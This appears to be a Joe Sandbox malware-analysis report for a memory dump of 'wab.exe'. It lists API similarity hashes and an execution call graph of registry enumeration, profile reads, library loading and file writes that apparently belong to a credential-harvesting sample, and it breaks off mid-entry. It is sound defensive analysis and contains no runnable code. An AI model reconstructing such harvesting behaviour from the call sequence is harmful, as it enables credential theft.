                                                                                            • API ID: ??2@$memset
                                                                                            • String ID:
                                                                                            • API String ID: 1860491036-0
                                                                                            • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                            • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memcmp.MSVCRT ref: 00408AF3
                                                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                            • memcmp.MSVCRT ref: 00408B2B
                                                                                            • memcmp.MSVCRT ref: 00408B5C
                                                                                            • memcpy.MSVCRT ref: 00408B79
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 231171946-0
                                                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcslen$wcscat$wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 1961120804-0
                                                                                            • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                            • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:2.3%
                                                                                            Dynamic/Decrypted Code Coverage:20.8%
                                                                                            Signature Coverage:0.5%
                                                                                            Total number of Nodes:832
                                                                                            Total number of Limit Nodes:16
                                                                                            execution_graph 33808 40fc40 70 API calls 33981 403640 21 API calls 33809 427fa4 42 API calls 33982 412e43 _endthreadex 33983 425115 76 API calls __fprintf_l 33984 43fe40 133 API calls 33812 425115 83 API calls __fprintf_l 33813 401445 memcpy memcpy DialogBoxParamA 33814 440c40 34 API calls 32939 444c4a 32958 444e38 32939->32958 32941 444c56 GetModuleHandleA 32942 444c68 __set_app_type __p__fmode __p__commode 32941->32942 32944 444cfa 32942->32944 32945 444d02 __setusermatherr 32944->32945 32946 444d0e 32944->32946 32945->32946 32959 444e22 _controlfp 32946->32959 32948 444d13 _initterm __getmainargs _initterm 32949 444d6a GetStartupInfoA 32948->32949 32951 444d9e GetModuleHandleA 32949->32951 32960 40cf44 32951->32960 32955 444dcf _cexit 32957 444e04 32955->32957 32956 444dc8 exit 32956->32955 32958->32941 32959->32948 33011 404a99 LoadLibraryA 32960->33011 32962 40cf60 32997 40cf64 32962->32997 33018 410d0e 32962->33018 32964 40cf6f 33022 40ccd7 ??2@YAPAXI 32964->33022 32966 40cf9b 33036 407cbc 32966->33036 32971 40cfc4 33054 409825 memset 32971->33054 32972 40cfd8 33059 4096f4 memset 32972->33059 32977 40d181 ??3@YAXPAX 32979 40d1b3 32977->32979 32980 40d19f DeleteObject 32977->32980 32978 407e30 _strcmpi 32981 40cfee 32978->32981 33083 407948 ??3@YAXPAX ??3@YAXPAX 32979->33083 32980->32979 32983 40cff2 RegDeleteKeyA 32981->32983 32984 40d007 EnumResourceTypesA 32981->32984 32983->32977 32986 40d047 32984->32986 32987 40d02f MessageBoxA 32984->32987 32985 40d1c4 33084 4080d4 ??3@YAXPAX 32985->33084 32989 40d0a0 CoInitialize 32986->32989 33064 40ce70 32986->33064 32987->32977 33081 40cc26 strncat memset RegisterClassA CreateWindowExA 32989->33081 32991 40d1cd 33085 407948 ??3@YAXPAX ??3@YAXPAX 32991->33085 32993 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33082 40c256 PostMessageA 32993->33082 32997->32955 32997->32956 32998 40d061 ??3@YAXPAX 32998->32979 33001 40d084 DeleteObject 32998->33001 32999 40d09e 32999->32989 33001->32979 33003 40d0f9 GetMessageA 33004 40d17b 33003->33004 33005 40d10d 33003->33005 33004->32977 33006 40d113 TranslateAccelerator 33005->33006 33008 40d145 IsDialogMessage 33005->33008 33009 40d139 IsDialogMessage 33005->33009 33006->33005 33007 40d16d GetMessageA 33006->33007 33007->33004 33007->33006 33008->33007 33010 40d157 TranslateMessage DispatchMessageA 33008->33010 33009->33007 33009->33008 33010->33007 33012 404ac4 GetProcAddress 33011->33012 33015 404ae8 33011->33015 33013 404ad4 33012->33013 33014 404add FreeLibrary 33012->33014 33013->33014 33014->33015 33016 404b13 33015->33016 33017 404afc MessageBoxA 33015->33017 33016->32962 33017->32962 33019 410d17 LoadLibraryA 33018->33019 33020 410d3c 33018->33020 33019->33020 33021 410d2b GetProcAddress 33019->33021 33020->32964 33021->33020 33023 40cd08 ??2@YAPAXI 33022->33023 33025 40cd26 33023->33025 33026 40cd2d 33023->33026 33093 404025 6 API calls 33025->33093 33028 40cd66 33026->33028 33029 40cd59 DeleteObject 33026->33029 33086 407088 33028->33086 33029->33028 33031 40cd6b 33089 4019b5 33031->33089 33034 4019b5 strncat 33035 40cdbf _mbscpy 33034->33035 33035->32966 33095 407948 ??3@YAXPAX ??3@YAXPAX 33036->33095 33038 407cf7 33041 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33038->33041 33042 407ddc 33038->33042 33044 407d7a ??3@YAXPAX 33038->33044 33049 407e04 33038->33049 33099 40796e 7 API calls 33038->33099 33100 406f30 33038->33100 33041->33038 33042->33049 33108 407a1f 33042->33108 33044->33038 33096 407a55 33049->33096 33050 407e30 33051 407e57 33050->33051 33052 407e38 33050->33052 33051->32971 33051->32972 33052->33051 33053 407e41 _strcmpi 33052->33053 33053->33051 33053->33052 33114 4097ff 33054->33114 33056 409854 33119 409731 33056->33119 33060 4097ff 3 API calls 33059->33060 33061 409723 33060->33061 33139 40966c 33061->33139 33153 4023b2 33064->33153 33070 40ced3 33242 40cdda 7 API calls 33070->33242 33071 40cece 33075 40cf3f 33071->33075 33194 40c3d0 memset GetModuleFileNameA strrchr 33071->33194 33075->32998 33075->32999 33077 40ceed 33221 40affa 33077->33221 33081->32993 33082->33003 33083->32985 33084->32991 33085->32997 33094 406fc7 memset _mbscpy 33086->33094 33088 40709f CreateFontIndirectA 33088->33031 33090 4019e1 33089->33090 33091 4019c2 strncat 33090->33091 33092 4019e5 memset LoadIconA 33090->33092 33091->33090 33092->33034 33093->33026 33094->33088 33095->33038 33097 407a65 33096->33097 33098 407a5b ??3@YAXPAX 33096->33098 33097->33050 33098->33097 33099->33038 33101 406f37 malloc 33100->33101 33102 406f7d 33100->33102 33104 406f73 33101->33104 33105 406f58 33101->33105 33102->33038 33104->33038 33106 406f6c ??3@YAXPAX 33105->33106 33107 406f5c memcpy 33105->33107 33106->33104 33107->33106 33109 407a38 33108->33109 33110 407a2d ??3@YAXPAX 33108->33110 33112 406f30 3 API calls 33109->33112 33111 407a43 33110->33111 33113 40796e 7 API calls 33111->33113 33112->33111 33113->33049 33130 406f96 GetModuleFileNameA 33114->33130 33116 409805 strrchr 33117 409814 33116->33117 33118 409817 _mbscat 33116->33118 33117->33118 33118->33056 33131 44b090 33119->33131 33124 40930c 3 API calls 33125 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33124->33125 33126 4097c5 LoadStringA 33125->33126 33127 4097db 33126->33127 33127->33126 33129 4097f3 33127->33129 33138 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33127->33138 33129->32977 33130->33116 33132 40973e _mbscpy _mbscpy 33131->33132 33133 40930c 33132->33133 33134 44b090 33133->33134 33135 409319 memset GetPrivateProfileStringA 33134->33135 33136 409374 33135->33136 33137 409364 WritePrivateProfileStringA 33135->33137 33136->33124 33137->33136 33138->33127 33149 406f81 GetFileAttributesA 33139->33149 33141 409675 33142 4096ee 33141->33142 33143 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33141->33143 33142->32978 33150 409278 GetPrivateProfileStringA 33143->33150 33145 4096c9 33151 409278 GetPrivateProfileStringA 33145->33151 33147 4096da 33152 409278 GetPrivateProfileStringA 33147->33152 33149->33141 33150->33145 33151->33147 33152->33142 33244 409c1c 33153->33244 33156 401e69 memset 33283 410dbb 33156->33283 33159 401ec2 33313 4070e3 strlen _mbscat _mbscpy _mbscat 33159->33313 33160 401ed4 33298 406f81 GetFileAttributesA 33160->33298 33163 401ee6 strlen strlen 33165 401f15 33163->33165 33166 401f28 33163->33166 33314 4070e3 strlen _mbscat _mbscpy _mbscat 33165->33314 33299 406f81 GetFileAttributesA 33166->33299 33169 401f35 33300 401c31 33169->33300 33172 401f75 33312 410a9c RegOpenKeyExA 33172->33312 33174 401c31 7 API calls 33174->33172 33175 401f91 33176 402187 33175->33176 33177 401f9c memset 33175->33177 33179 402195 ExpandEnvironmentStringsA 33176->33179 33180 4021a8 _strcmpi 33176->33180 33315 410b62 RegEnumKeyExA 33177->33315 33324 406f81 GetFileAttributesA 33179->33324 33180->33070 33180->33071 33182 40217e RegCloseKey 33182->33176 33183 401fd9 atoi 33184 401fef memset memset sprintf 33183->33184 33192 401fc9 33183->33192 33316 410b1e 33184->33316 33187 402165 33187->33182 33188 402076 memset memset strlen strlen 33188->33192 33189 4020dd strlen strlen 33189->33192 33190 4070e3 strlen _mbscat _mbscpy _mbscat 33190->33192 33191 406f81 GetFileAttributesA 33191->33192 33192->33182 33192->33183 33192->33187 33192->33188 33192->33189 33192->33190 33192->33191 33193 402167 _mbscpy 33192->33193 33323 410b62 RegEnumKeyExA 33192->33323 33193->33182 33195 40c422 33194->33195 33196 40c425 _mbscat _mbscpy _mbscpy 33194->33196 33195->33196 33197 40c49d 33196->33197 33198 40c512 33197->33198 33199 40c502 GetWindowPlacement 33197->33199 33200 40c538 33198->33200 33345 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33198->33345 33199->33198 33338 409b31 33200->33338 33204 40ba28 33205 40ba87 33204->33205 33209 40ba3c 33204->33209 33348 406c62 LoadCursorA SetCursor 33205->33348 33207 40ba8c 33349 404734 33207->33349 33357 403c16 33207->33357 33433 404785 33207->33433 33436 410a9c RegOpenKeyExA 33207->33436 33437 4107f1 33207->33437 33208 40ba43 _mbsicmp 33208->33209 33209->33205 33209->33208 33440 40b5e5 10 API calls 33209->33440 33210 40baa0 33211 407e30 _strcmpi 33210->33211 33212 40bab0 33211->33212 33213 40bafa SetCursor 33212->33213 33215 40baf1 qsort 33212->33215 33213->33077 33215->33213 33801 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33221->33801 33223 40b00e 33224 40b016 33223->33224 33225 40b01f GetStdHandle 33223->33225 33802 406d1a CreateFileA 33224->33802 33227 40b01c 33225->33227 33228 40b035 33227->33228 33229 40b12d 33227->33229 33803 406c62 LoadCursorA SetCursor 33228->33803 33807 406d77 9 API calls 33229->33807 33232 40b136 33243 40c580 28 API calls 33232->33243 33233 40b087 33240 40b0a1 33233->33240 33805 40a699 12 API calls 33233->33805 33234 40b042 33234->33233 33234->33240 33804 40a57c strlen WriteFile 33234->33804 33237 40b0d6 33238 40b116 CloseHandle 33237->33238 33239 40b11f SetCursor 33237->33239 33238->33239 33239->33232 33240->33237 33806 406d77 9 API calls 33240->33806 33242->33071 33243->33075 33256 409a32 33244->33256 33247 409c80 memcpy memcpy 33252 409cda 33247->33252 33248 409d18 ??2@YAPAXI ??2@YAPAXI 33250 409d54 ??2@YAPAXI 33248->33250 33253 409d8b 33248->33253 33249 408db6 12 API calls 33249->33252 33250->33253 33252->33247 33252->33248 33252->33249 33253->33253 33266 409b9c 33253->33266 33255 4023c1 33255->33156 33257 409a44 33256->33257 33258 409a3d ??3@YAXPAX 33256->33258 33259 409a52 33257->33259 33260 409a4b ??3@YAXPAX 33257->33260 33258->33257 33261 409a63 33259->33261 33262 409a5c ??3@YAXPAX 33259->33262 33260->33259 33263 409a83 ??2@YAPAXI ??2@YAPAXI 33261->33263 33264 409a73 ??3@YAXPAX 33261->33264 33265 409a7c ??3@YAXPAX 33261->33265 33262->33261 33263->33247 33264->33265 33265->33263 33267 407a55 ??3@YAXPAX 33266->33267 33268 409ba5 33267->33268 33269 407a55 ??3@YAXPAX 33268->33269 33270 409bad 33269->33270 33271 407a55 ??3@YAXPAX 33270->33271 33272 409bb5 33271->33272 33273 407a55 ??3@YAXPAX 33272->33273 33274 409bbd 33273->33274 33275 407a1f 4 API calls 33274->33275 33276 409bd0 33275->33276 33277 407a1f 4 API calls 33276->33277 33278 409bda 33277->33278 33279 407a1f 4 API calls 33278->33279 33280 409be4 33279->33280 33281 407a1f 4 API calls 33280->33281 33282 409bee 33281->33282 33282->33255 33284 410d0e 2 API calls 33283->33284 33285 410dca 33284->33285 33286 410dfd memset 33285->33286 33325 4070ae 33285->33325 33287 410e1d 33286->33287 33328 410a9c RegOpenKeyExA 33287->33328 33291 401e9e strlen strlen 33291->33159 33291->33160 33292 410e4a 33293 410e7f _mbscpy 33292->33293 33329 410d3d _mbscpy 33292->33329 33293->33291 33295 410e5b 33330 410add RegQueryValueExA 33295->33330 33297 410e73 RegCloseKey 33297->33293 33298->33163 33299->33169 33331 410a9c RegOpenKeyExA 33300->33331 33302 401c4c 33303 401cad 33302->33303 33332 410add RegQueryValueExA 33302->33332 33303->33172 33303->33174 33305 401c6a 33306 401c71 strchr 33305->33306 33307 401ca4 RegCloseKey 33305->33307 33306->33307 33308 401c85 strchr 33306->33308 33307->33303 33308->33307 33309 401c94 33308->33309 33333 406f06 strlen 33309->33333 33311 401ca1 33311->33307 33312->33175 33313->33160 33314->33166 33315->33192 33336 410a9c RegOpenKeyExA 33316->33336 33318 410b34 33319 410b5d 33318->33319 33337 410add RegQueryValueExA 33318->33337 33319->33192 33321 410b4c RegCloseKey 33321->33319 33323->33192 33324->33180 33326 4070bd GetVersionExA 33325->33326 33327 4070ce 33325->33327 33326->33327 33327->33286 33327->33291 33328->33292 33329->33295 33330->33297 33331->33302 33332->33305 33334 406f17 33333->33334 33335 406f1a memcpy 33333->33335 33334->33335 33335->33311 33336->33318 33337->33321 33339 409b40 33338->33339 33341 409b4e 33338->33341 33346 409901 memset SendMessageA 33339->33346 33342 409b99 33341->33342 33343 409b8b 33341->33343 33342->33204 33347 409868 SendMessageA 33343->33347 33345->33200 33346->33341 33347->33342 33348->33207 33350 404785 FreeLibrary 33349->33350 33351 40473b LoadLibraryA 33350->33351 33352 40474c GetProcAddress 33351->33352 33353 40476e 33351->33353 33352->33353 33354 404764 33352->33354 33355 404781 33353->33355 33356 404785 FreeLibrary 33353->33356 33354->33353 33355->33210 33356->33355 33358 4107f1 FreeLibrary 33357->33358 33359 403c30 LoadLibraryA 33358->33359 33360 403c74 33359->33360 33361 403c44 GetProcAddress 33359->33361 33362 4107f1 FreeLibrary 33360->33362 33361->33360 33363 403c5e 33361->33363 33364 403c7b 33362->33364 33363->33360 33366 403c6b 33363->33366 33365 404734 3 API calls 33364->33365 33367 403c86 33365->33367 33366->33364 33441 4036e5 33367->33441 33370 4036e5 26 API calls 33371 403c9a 33370->33371 33372 4036e5 26 API calls 33371->33372 33373 403ca4 33372->33373 33374 4036e5 26 API calls 33373->33374 33375 403cae 33374->33375 33453 4085d2 33375->33453 33383 403ce5 33384 403cf7 33383->33384 33634 402bd1 39 API calls 33383->33634 33499 410a9c RegOpenKeyExA 33384->33499 33387 403d0a 33388 403d1c 33387->33388 33635 402bd1 39 API calls 33387->33635 33500 402c5d 33388->33500 33392 4070ae GetVersionExA 33393 403d31 33392->33393 33518 410a9c RegOpenKeyExA 33393->33518 33395 403d51 33396 403d61 33395->33396 33636 402b22 46 API calls 33395->33636 33519 410a9c RegOpenKeyExA 33396->33519 33399 403d87 33400 403d97 33399->33400 33637 402b22 46 API calls 33399->33637 33520 410a9c RegOpenKeyExA 33400->33520 33403 403dbd 33404 403dcd 33403->33404 33638 402b22 46 API calls 33403->33638 33521 410808 33404->33521 33408 404785 FreeLibrary 33409 403de8 33408->33409 33525 402fdb 33409->33525 33412 402fdb 34 API calls 33413 403e00 33412->33413 33541 4032b7 33413->33541 33422 403e3b 33424 403e73 33422->33424 33425 403e46 _mbscpy 33422->33425 33588 40fb00 33424->33588 33640 40f334 334 API calls 33425->33640 33434 4047a3 33433->33434 33435 404799 FreeLibrary 33433->33435 33434->33210 33435->33434 33436->33210 33438 410807 33437->33438 33439 4107fc FreeLibrary 33437->33439 33438->33210 33439->33438 33440->33209 33442 4037c5 33441->33442 33443 4036fb 33441->33443 33442->33370 33641 410863 UuidFromStringA UuidFromStringA memcpy 33443->33641 33445 40370e 33445->33442 33446 403716 strchr 33445->33446 33446->33442 33447 403730 33446->33447 33642 4021b6 memset 33447->33642 33449 40373f _mbscpy _mbscpy strlen 33450 4037a4 _mbscpy 33449->33450 33451 403789 sprintf 33449->33451 33643 4023e5 16 API calls 33450->33643 33451->33450 33454 4085e2 33453->33454 33644 4082cd 11 API calls 33454->33644 33458 408600 33459 403cba 33458->33459 33460 40860b memset 33458->33460 33471 40821d 33459->33471 33647 410b62 RegEnumKeyExA 33460->33647 33462 4086d2 RegCloseKey 33462->33459 33464 408637 33464->33462 33465 40865c memset 33464->33465 33648 410a9c RegOpenKeyExA 33464->33648 33651 410b62 RegEnumKeyExA 33464->33651 33649 410add RegQueryValueExA 33465->33649 33468 408694 33650 40848b 10 API calls 33468->33650 33470 4086ab RegCloseKey 33470->33464 33652 410a9c RegOpenKeyExA 33471->33652 33473 40823f 33474 403cc6 33473->33474 33475 408246 memset 33473->33475 33483 4086e0 33474->33483 33653 410b62 RegEnumKeyExA 33475->33653 33477 4082bf RegCloseKey 33477->33474 33479 40826f 33479->33477 33654 410a9c RegOpenKeyExA 33479->33654 33655 4080ed 11 API calls 33479->33655 33656 410b62 RegEnumKeyExA 33479->33656 33482 4082a2 RegCloseKey 33482->33479 33657 4045db 33483->33657 33485 4088ef 33665 404656 33485->33665 33489 408737 wcslen 33489->33485 33492 40876a 33489->33492 33490 40877a _wcsncoll 33490->33492 33492->33485 33492->33490 33493 404734 3 API calls 33492->33493 33494 404785 FreeLibrary 33492->33494 33495 408812 memset 33492->33495 33496 40883c memcpy wcschr 33492->33496 33497 4088c3 LocalFree 33492->33497 33668 40466b _mbscpy 33492->33668 33493->33492 33494->33492 33495->33492 33495->33496 33496->33492 33497->33492 33498 410a9c RegOpenKeyExA 33498->33383 33499->33387 33669 410a9c RegOpenKeyExA 33500->33669 33502 402c7a 33503 402da5 33502->33503 33504 402c87 memset 33502->33504 33503->33392 33670 410b62 RegEnumKeyExA 33504->33670 33506 402d9c RegCloseKey 33506->33503 33507 410b1e 3 API calls 33508 402ce4 memset sprintf 33507->33508 33671 410a9c RegOpenKeyExA 33508->33671 33510 402d28 33511 402d3a sprintf 33510->33511 33672 402bd1 39 API calls 33510->33672 33673 410a9c RegOpenKeyExA 33511->33673 33516 402cb2 33516->33506 33516->33507 33517 402d9a 33516->33517 33674 402bd1 39 API calls 33516->33674 33675 410b62 RegEnumKeyExA 33516->33675 33517->33506 33518->33395 33519->33399 33520->33403 33522 410816 33521->33522 33523 4107f1 FreeLibrary 33522->33523 33524 403ddd 33523->33524 33524->33408 33676 410a9c RegOpenKeyExA 33525->33676 33527 402ff9 33528 403006 memset 33527->33528 33529 40312c 33527->33529 33677 410b62 RegEnumKeyExA 33528->33677 33529->33412 33531 403033 33532 403122 RegCloseKey 33531->33532 33533 410b1e 3 API calls 33531->33533 33536 4030a2 memset 33531->33536 33538 410b62 RegEnumKeyExA 33531->33538 33539 4030f9 RegCloseKey 33531->33539 33680 402db3 26 API calls 33531->33680 33532->33529 33534 403058 memset sprintf 33533->33534 33678 410a9c RegOpenKeyExA 33534->33678 33679 410b62 RegEnumKeyExA 33536->33679 33538->33531 33539->33531 33542 4032d5 33541->33542 33543 4033a9 33541->33543 33681 4021b6 memset 33542->33681 33556 4034e4 memset memset 33543->33556 33545 4032e1 33682 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33545->33682 33547 4032ea 33548 4032f8 memset GetPrivateProfileSectionA 33547->33548 33683 4023e5 16 API calls 33547->33683 33548->33543 33553 40332f 33548->33553 33550 40339b strlen 33550->33543 33550->33553 33552 403350 strchr 33552->33553 33553->33543 33553->33550 33684 4021b6 memset 33553->33684 33685 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33553->33685 33686 4023e5 16 API calls 33553->33686 33557 410b1e 3 API calls 33556->33557 33558 40353f 33557->33558 33559 40357f 33558->33559 33560 403546 _mbscpy 33558->33560 33564 403985 33559->33564 33687 406d55 strlen _mbscat 33560->33687 33562 403565 _mbscat 33688 4033f0 19 API calls 33562->33688 33689 40466b _mbscpy 33564->33689 33568 4039aa 33570 4039ff 33568->33570 33690 40f460 memset memset 33568->33690 33711 40f6e2 33568->33711 33727 4038e8 21 API calls 33568->33727 33571 404785 FreeLibrary 33570->33571 33572 403a0b 33571->33572 33573 4037ca memset memset 33572->33573 33735 444551 memset 33573->33735 33576 4038e2 33576->33422 33639 40f334 334 API calls 33576->33639 33578 40382e 33579 406f06 2 API calls 33578->33579 33580 403843 33579->33580 33581 406f06 2 API calls 33580->33581 33582 403855 strchr 33581->33582 33583 403884 _mbscpy 33582->33583 33584 403897 strlen 33582->33584 33585 4038bf _mbscpy 33583->33585 33584->33585 33586 4038a4 sprintf 33584->33586 33747 4023e5 16 API calls 33585->33747 33586->33585 33589 44b090 33588->33589 33590 40fb10 RegOpenKeyExA 33589->33590 33591 403e7f 33590->33591 33592 40fb3b RegOpenKeyExA 33590->33592 33602 40f96c 33591->33602 33593 40fb55 RegQueryValueExA 33592->33593 33594 40fc2d RegCloseKey 33592->33594 33595 40fc23 RegCloseKey 33593->33595 33596 40fb84 33593->33596 33594->33591 33595->33594 33597 404734 3 API calls 33596->33597 33598 40fb91 33597->33598 33598->33595 33599 40fc19 LocalFree 33598->33599 33600 40fbdd memcpy memcpy 33598->33600 33599->33595 33752 40f802 11 API calls 33600->33752 33603 4070ae GetVersionExA 33602->33603 33604 40f98d 33603->33604 33605 4045db 7 API calls 33604->33605 33609 40f9a9 33605->33609 33606 40fae6 33607 404656 FreeLibrary 33606->33607 33608 403e85 33607->33608 33614 4442ea memset 33608->33614 33609->33606 33610 40fa13 memset WideCharToMultiByte 33609->33610 33610->33609 33611 40fa43 _strnicmp 33610->33611 33611->33609 33612 40fa5b WideCharToMultiByte 33611->33612 33612->33609 33613 40fa88 WideCharToMultiByte 33612->33613 33613->33609 33615 410dbb 9 API calls 33614->33615 33616 444329 33615->33616 33753 40759e strlen strlen 33616->33753 33621 410dbb 9 API calls 33622 444350 33621->33622 33623 40759e 3 API calls 33622->33623 33624 44435a 33623->33624 33625 444212 65 API calls 33624->33625 33626 444366 memset memset 33625->33626 33627 410b1e 3 API calls 33626->33627 33628 4443b9 ExpandEnvironmentStringsA strlen 33627->33628 33629 4443f4 _strcmpi 33628->33629 33630 4443e5 33628->33630 33631 403e91 33629->33631 33632 44440c 33629->33632 33630->33629 33631->33210 33633 444212 65 API calls 33632->33633 33633->33631 33634->33384 33635->33388 33636->33396 33637->33400 33638->33404 33639->33422 33640->33424 33641->33445 33642->33449 33643->33442 33645 40841c 33644->33645 33646 410a9c RegOpenKeyExA 33645->33646 33646->33458 33647->33464 33648->33464 33649->33468 33650->33470 33651->33464 33652->33473 33653->33479 33654->33479 33655->33482 33656->33479 33658 404656 FreeLibrary 33657->33658 33659 4045e3 LoadLibraryA 33658->33659 33660 404651 33659->33660 33661 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33659->33661 33660->33485 33660->33489 33662 40463d 33661->33662 33663 404656 FreeLibrary 33662->33663 33664 404643 33662->33664 33663->33660 33664->33660 33666 403cd2 33665->33666 33667 40465c FreeLibrary 33665->33667 33666->33498 33667->33666 33668->33492 33669->33502 33670->33516 33671->33510 33672->33511 33673->33516 33674->33516 33675->33516 33676->33527 33677->33531 33678->33531 33679->33531 33680->33531 33681->33545 33682->33547 33683->33548 33684->33552 33685->33553 33686->33553 33687->33562 33688->33559 33689->33568 33728 4078ba 33690->33728 33693 4078ba _mbsnbcat 33694 40f5a3 RegOpenKeyExA 33693->33694 33695 40f5c3 RegQueryValueExA 33694->33695 33696 40f6d9 33694->33696 33697 40f6d0 RegCloseKey 33695->33697 33698 40f5f0 33695->33698 33696->33568 33697->33696 33698->33697 33708 40f675 33698->33708 33732 40466b _mbscpy 33698->33732 33700 40f611 33702 404734 3 API calls 33700->33702 33707 40f616 33702->33707 33703 40f69e RegQueryValueExA 33703->33697 33704 40f6c1 33703->33704 33704->33697 33705 40f66a 33706 404785 FreeLibrary 33705->33706 33706->33708 33707->33705 33709 40f661 LocalFree 33707->33709 33710 40f645 memcpy 33707->33710 33708->33697 33733 4012ee strlen 33708->33733 33709->33705 33710->33709 33734 40466b _mbscpy 33711->33734 33713 40f6fa 33714 4045db 7 API calls 33713->33714 33715 40f708 33714->33715 33716 404734 3 API calls 33715->33716 33722 40f7e2 33715->33722 33718 40f715 33716->33718 33717 404656 FreeLibrary 33719 40f7f1 33717->33719 33718->33722 33723 40f797 WideCharToMultiByte 33718->33723 33720 404785 FreeLibrary 33719->33720 33721 40f7fc 33720->33721 33721->33568 33722->33717 33724 40f7b8 strlen 33723->33724 33725 40f7d9 LocalFree 33723->33725 33724->33725 33726 40f7c8 _mbscpy 33724->33726 33725->33722 33726->33725 33727->33568 33729 4078e6 33728->33729 33730 4078c7 _mbsnbcat 33729->33730 33731 4078ea 33729->33731 33730->33729 33731->33693 33732->33700 33733->33703 33734->33713 33748 410a9c RegOpenKeyExA 33735->33748 33737 40381a 33737->33576 33746 4021b6 memset 33737->33746 33738 44458b 33738->33737 33749 410add RegQueryValueExA 33738->33749 33740 4445a4 33741 4445dc RegCloseKey 33740->33741 33750 410add RegQueryValueExA 33740->33750 33741->33737 33743 4445c1 33743->33741 33751 444879 30 API calls 33743->33751 33745 4445da 33745->33741 33746->33578 33747->33576 33748->33738 33749->33740 33750->33743 33751->33745 33752->33599 33754 4075c9 33753->33754 33755 4075bb _mbscat 33753->33755 33756 444212 33754->33756 33755->33754 33773 407e9d 33756->33773 33759 44424d 33760 444274 33759->33760 33762 444258 33759->33762 33781 407ef8 33759->33781 33761 407e9d 9 API calls 33760->33761 33770 4442a0 33761->33770 33798 444196 52 API calls 33762->33798 33764 407ef8 9 API calls 33764->33770 33765 4442ce 33795 407f90 33765->33795 33769 407f90 FindClose 33771 4442e4 33769->33771 33770->33764 33770->33765 33772 444212 65 API calls 33770->33772 33791 407e62 33770->33791 33771->33621 33772->33770 33774 407f90 FindClose 33773->33774 33775 407eaa 33774->33775 33776 406f06 2 API calls 33775->33776 33777 407ebd strlen strlen 33776->33777 33778 407ee1 33777->33778 33780 407eea 33777->33780 33799 4070e3 strlen _mbscat _mbscpy _mbscat 33778->33799 33780->33759 33782 407f03 FindFirstFileA 33781->33782 33783 407f24 FindNextFileA 33781->33783 33784 407f3f 33782->33784 33785 407f46 strlen strlen 33783->33785 33786 407f3a 33783->33786 33784->33785 33788 407f7f 33784->33788 33785->33788 33789 407f76 33785->33789 33787 407f90 FindClose 33786->33787 33787->33784 33788->33759 33800 4070e3 strlen _mbscat _mbscpy _mbscat 33789->33800 33792 407e94 33791->33792 33793 407e6c strcmp 33791->33793 33792->33770 33793->33792 33794 407e83 strcmp 33793->33794 33794->33792 33796 407fa3 33795->33796 33797 407f99 FindClose 33795->33797 33796->33769 33797->33796 33798->33759 33799->33780 33800->33788 33801->33223 33802->33227 33803->33234 33804->33233 33805->33240 33806->33237 33807->33232 33816 411853 RtlInitializeCriticalSection memset 33817 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33990 40a256 13 API calls 33992 432e5b 17 API calls 33994 43fa5a 20 API calls 33819 401060 41 API calls 33997 427260 CloseHandle memset memset 32916 410c68 FindResourceA 32917 410c81 SizeofResource 32916->32917 32920 410cae 32916->32920 32918 410c92 LoadResource 32917->32918 32917->32920 32919 410ca0 LockResource 32918->32919 32918->32920 32919->32920 33999 405e69 14 API calls 33824 433068 15 API calls __fprintf_l 34001 414a6d 18 API calls 34002 43fe6f 134 API 